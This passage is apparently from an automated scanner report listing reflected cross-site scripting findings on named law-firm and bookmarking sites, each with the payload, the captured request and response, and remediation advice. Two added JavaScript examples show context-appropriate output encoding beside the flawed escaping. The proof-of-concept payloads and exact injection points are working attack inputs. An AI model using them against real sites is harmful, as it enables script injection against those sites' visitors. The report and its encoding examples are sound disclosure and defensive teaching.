                                   // variable contructors
var txtElements = [{txt:'qkw',btn:'sqkwc9b6d';alert(1)//dd5166876a6'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw');input1.setAttribute('autocomplete','off');

function JSONscriptRequest(fullUrl, query) {
// RE
...[SNIP]...

4.66. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12d9b<script>alert(1)</script>893317d02a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is in the site's 404 error page; the status code does not reduce exploitability, because the browser renders the body of a 404 response and executes any script in it exactly as it would for a 200.

Request

GET /bookmark.php12d9b<script>alert(1)</script>893317d02a5 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:26:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ukeipc25sb6n7ajap5tqd3fsa1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php12d9b<script>alert(1)</script>893317d02a5</strong>
...[SNIP]...

4.67. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8866e"-alert(1)-"49ee98219f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As in 4.66, the reflection is in the 404 error page, which the browser renders and executes like any other response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php8866e"-alert(1)-"49ee98219f7 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:26:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=tioju43rv1im39822nkpbqlp26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php8866e"-alert(1)-"49ee98219f7";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.68. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4591f"-alert(1)-"57e0244f404 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/4591f"-alert(1)-"57e0244f404 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:26:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/4591f"-alert(1)-"57e0244f404";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.69. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e6e"><script>alert(1)</script>277857ca11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices.cfm?u=FinancialServices&action=view&id=476&32e6e"><script>alert(1)</script>277857ca11c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Financial Services</title>
       <meta name="Descriptio
...[SNIP]...
<input type="hidden" name="32e6e"><script>alert(1)</script>277857ca11c" value="1" />
...[SNIP]...

4.70. http://www.arnoldporter.com/practices.cfm [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e37"><script>alert(1)</script>b1acff3e126 was submitted in the u parameter. This input was echoed as e8e37\"><script>alert(1)</script>b1acff3e126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application prefixes the double quote with a backslash, which is a JavaScript-style escape applied in an HTML context; HTML has no backslash escape, so the quote still terminates the attribute value and the markup that follows it is parsed as usual. The correct fix for this context is HTML entity encoding (&quot;, &lt;, &gt;) of the attribute value.

Request

GET /practices.cfm?u=FinancialServicese8e37"><script>alert(1)</script>b1acff3e126&action=view&id=476 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Financial Services</title>
       <meta name="Descriptio
...[SNIP]...
<input type="hidden" name="u" value="FinancialServicese8e37\"><script>alert(1)</script>b1acff3e126" />
...[SNIP]...
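The remediation notes for 4.63 to 4.65 and 4.67 say to avoid echoing user data inside script at all; where it cannot be avoided, the output must be encoded for the context it lands in, and finding 4.70 shows what goes wrong when the wrong encoder is picked. The following is an added example, not the site's or the scanner's code: it renders a dn value into the four contexts the domainView findings show (title text, a double-quoted meta attribute, a hidden-input attribute, a JavaScript string literal) through the encoder each context needs, and sets finding 4.70's backslash escaping beside entity encoding, reading the attribute back the way an HTML tokenizer would. The HTML skeleton mirrors the report's response snippets; the script line is an assumption that concatenates the value rather than splicing it into the middle of a URL literal as the original page does.

```javascript
// Added example, not the site's or the scanner's code: the dn value rendered
// into the four contexts the domainView findings show, each through the
// encoder that context needs, next to the backslash escaping that finding
// 4.70 shows and why it fails in HTML.
'use strict';

// HTML text and quoted-attribute contexts: entity-encode the metacharacters.
// Attribute values must also be quoted; entities do not protect bare ones.
function htmlEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// JavaScript string-literal context: JSON-encode, then \u-escape the
// characters that could close the surrounding <script> block ('<', '>', '&')
// or end a line in older engines (U+2028, U+2029). The result is a complete,
// double-quoted literal ready to paste into the script.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// What finding 4.70 shows: a JavaScript-style escape applied to an HTML
// attribute. HTML has no backslash escape, so the quote still ends the value.
function backslashEscape(value) {
  return String(value).replace(/"/g, '\\"');
}

// Read a double-quoted attribute the way an HTML tokenizer does: the value
// runs to the next '"' whatever precedes it, and entities are decoded after.
function readAttr(html, name) {
  const start = html.indexOf(name + '="');
  if (start === -1) return null;
  const from = start + name.length + 2;
  const end = html.indexOf('"', from);
  const raw = end === -1 ? html.slice(from) : html.slice(from, end);
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'" };
  return raw.replace(/&(amp|lt|gt|quot|#39);/g, (_, e) => map[e]);
}

// Finding 4.70's hidden input rendered both ways (markup mirrors the report).
// With the backslash the tokenizer stops at the injected quote and the rest of
// the probe becomes markup; with entities the whole value round-trips.
function compareEscapes(probe) {
  const bad = `<input type="hidden" name="u" value="FinancialServices${backslashEscape(probe)}" />`;
  const good = `<input type="hidden" name="u" value="FinancialServices${htmlEncode(probe)}" />`;
  return { bad: readAttr(bad, 'value'), good: readAttr(good, 'value') };
}

// The domainView fragment with every context encoded for where it sits
// (hypothetical rewrite of the page; the script line is an assumption).
function renderDomainView(dn) {
  const h = htmlEncode(dn);
  return [
    `<title>${h}</title>`,
    `<meta name="description" content="Look no further for the best information on ${h}">`,
    `<input type="hidden" name="dn" value="${h}">`,
    '<script type="text/javascript">',
    `var mobile_redirect_url = 'http://' + ${jsStringLiteral(dn)} + '/domainserve/domainView?mobile=1';`,
    '</script>',
  ].join('\n');
}

console.log(compareEscapes('e8e37"><script>alert(1)</script>b1acff3e126'));
console.log(renderDomainView("58025';alert(1)//1b423bdb38b"));
```

For the 4.70 probe the backslash-escaped attribute reads back as FinancialServicese8e37\ with the injected <script> now outside the value, while the entity-encoded one reads back as the full probe text and never becomes markup. The JSON-based literal handles the 4.63 probe because the enclosing quote it produces is a double quote and a stray single quote inside it is data; the extra \u escapes stop a </script> inside the value from ending the block, which JSON.stringify alone would not prevent.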

4.71. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /publications.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ef8"><script>alert(1)</script>f0da3e29c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Publications</title>
       <meta name="Description" con
...[SNIP]...
<a href=" /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1&expand_section=advisory">
...[SNIP]...

4.72. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /about_the_firm/firm_history

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3824'-alert(1)-'1b19dddffc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about_the_firm/firm_history?b3824'-alert(1)-'1b19dddffc8=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:43:35 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1298; path=/
Set-Cookie: PortletId=1293201; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18798


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | About the Firm | Firm History</title>
<meta na
...[SNIP]...
about_the_firm/firm_history/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/about_the_firm/firm_history/AboutSection.aspx?b3824'-alert(1)-'1b19dddffc8=1';//]]>
...[SNIP]...

4.73. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /balancingworkandfamilylife

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec112'-alert(1)-'d654b8e90b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /balancingworkandfamilylife?ec112'-alert(1)-'d654b8e90b6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:05 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1155; path=/
Set-Cookie: PortletId=1146501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Work-Life Balance</title>
<meta na
...[SNIP]...
= '/balancingworkandfamilylife/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/balancingworkandfamilylife/Diversity.aspx?ec112'-alert(1)-'d654b8e90b6=1';//]]>
...[SNIP]...

4.74. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /bestviewed

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18d5'-alert(1)-'b19132c4a4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bestviewed?e18d5'-alert(1)-'b19132c4a4f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1359; path=/
Set-Cookie: PortletId=1350401; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10955


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Best Viewed</title>
<meta name="language" cont
...[SNIP]...
document.aspnetForm.action = '/bestviewed/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/bestviewed/GeneralPageData.aspx?e18d5'-alert(1)-'b19132c4a4f=1';//]]>
...[SNIP]...
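The injection pattern visible in the captured script line above, reproduced as an added example (illustration code written for this page, not the scanner's output or the site's own code). The names buildVulnerableScript, buildUrlEncodedScript, jsStringEncode, buildHardenedScript and runInSandbox are this example's own; the payload string is the one from the request in 4.74. The sandbox stubs alert and myForm and evaluates the generated line with new Function, which stands in for a browser executing the inline script after the redirect.

```javascript
// Added example: the single-quoted JS string injection behind finding 4.74,
// reproduced offline with stubs, next to the encoding that neutralises it.

// Parameter name copied from the report's request; its value is irrelevant.
const PAYLOAD_NAME = "e18d5'-alert(1)-'b19132c4a4f";
const TARGET = '/bestviewed/GeneralPageData.aspx';

// Vulnerable pattern: the page rebuilds the form action from the request's
// query string (parameter name included) inside a single-quoted literal.
function buildVulnerableScript(path, queryString) {
  return "myForm.action='" + path + '?' + queryString + "';";
}

// Same pattern with URL-encoding only. encodeURIComponent leaves ' ( ) and -
// unescaped, so the breakout survives intact.
function buildUrlEncodedScript(path, name, value) {
  return buildVulnerableScript(path,
    encodeURIComponent(name) + '=' + encodeURIComponent(value));
}

// Hardened pattern: everything outside [A-Za-z0-9] becomes a \xHH or \uHHHH
// escape, so no attacker character can close the literal, open a comment or
// spell </script>. The literal's *value* after parsing is unchanged.
function jsStringEncode(s) {
  let out = '';
  for (const ch of s) {
    const cp = ch.codePointAt(0);
    if (/^[A-Za-z0-9]$/.test(ch)) {
      out += ch;
    } else if (cp < 0x100) {
      out += '\\x' + cp.toString(16).padStart(2, '0');
    } else if (cp < 0x10000) {
      out += '\\u' + cp.toString(16).padStart(4, '0');
    } else {
      // Astral code points: emit a surrogate pair, valid in every JS engine.
      const c = cp - 0x10000;
      out += '\\u' + (0xd800 + (c >> 10)).toString(16) +
             '\\u' + (0xdc00 + (c & 0x3ff)).toString(16);
    }
  }
  return out;
}

function buildHardenedScript(path, queryString) {
  return "myForm.action='" + jsStringEncode(path + '?' + queryString) + "';";
}

// Stand-in for the browser executing the inline script: alert and myForm are
// stubbed and we record what the script did to them.
function runInSandbox(script) {
  const alerts = [];
  const myForm = { action: '' };
  new Function('myForm', 'alert', script)(myForm, (v) => { alerts.push(v); });
  return { alerts, action: myForm.action };
}

// Runs all three variants against the report's payload.
function demo() {
  const qs = PAYLOAD_NAME + '=1';
  return {
    vulnerable: runInSandbox(buildVulnerableScript(TARGET, qs)),
    urlEncoded: runInSandbox(buildUrlEncodedScript(TARGET, PAYLOAD_NAME, '1')),
    hardened: runInSandbox(buildHardenedScript(TARGET, qs)),
  };
}

const results = demo();
for (const [name, r] of Object.entries(results)) {
  console.log(name + ': alert fired ' + r.alerts.length +
              ' time(s); myForm.action = ' + String(r.action));
}
```

In the vulnerable and URL-encoded variants the statement evaluates as `'...?e18d5' - alert(1) - 'b19132c4a4f=1'`, so alert runs and myForm.action ends up as NaN; in the hardened variant alert never runs and myForm.action is exactly the intended URL, payload text included, because the escapes are decoded by the JavaScript parser rather than interpreted as syntax. Context-specific output encoding, not input filtering or URL encoding, is what closes this class of bug.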

4.75. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /biographies

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b19'-alert(1)-'10a178ca3f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /biographies?c3b19'-alert(1)-'10a178ca3f5=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:05 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1141; path=/
Set-Cookie: PortletId=1132501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 152733


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Biographies</title>
<meta name="language" cont
...[SNIP]...
DATA[
